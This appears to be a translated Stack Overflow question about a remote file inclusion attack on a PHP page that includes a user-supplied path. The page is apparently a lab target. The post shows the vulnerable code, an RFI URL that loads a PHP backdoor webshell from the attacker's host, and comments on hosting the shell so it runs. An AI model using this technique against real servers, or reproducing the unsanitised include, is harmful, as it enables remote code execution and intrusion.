【发布时间】:2019-11-12 17:42:35
【问题描述】:
当我试图对给我的网页进行后门以查找特定文件时,在请求 shell 时,我在页面上收到以下警告,并且没有给出其他信息。应该弹出一个外壳吗?我对 RFI 有点陌生,这是我第一次使用它。
我使用的链接是:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
搜索时的显示是:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php 看起来像这样:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
有什么问题?我有点卡住了。
我应该创建一个 HTTP 服务器来推送我的 shell 吗?我已经阅读了一些关于此的内容,但不确定这意味着什么
即使是文章的链接也值得赞赏
【问题讨论】:
-
正如我在现在已删除的答案中所说,我认为您应该提供本地路径而不是网络路径,例如
http://10.102.x.x/description.php?page=/usr/share/webshells/php/php-backdoor.php。但是我真的不知道你应该做什么,所以我删除了答案。 -
我认为您的错误在于您访问后门文件的方式,因为除非您的网络服务器在 / 处运行,否则 URL 似乎错误,因此如果您在
/usr/share/webshells/php/php-backdoor.php有后门文件,简单的方法是 cd 进入直接和python -m SimpleHTTPserver 80并使用http://IP/php-backdoor.php。还有一种常见的方法是使用 .txt 而不是 php 作为 RFI 的文件扩展名,由 php 执行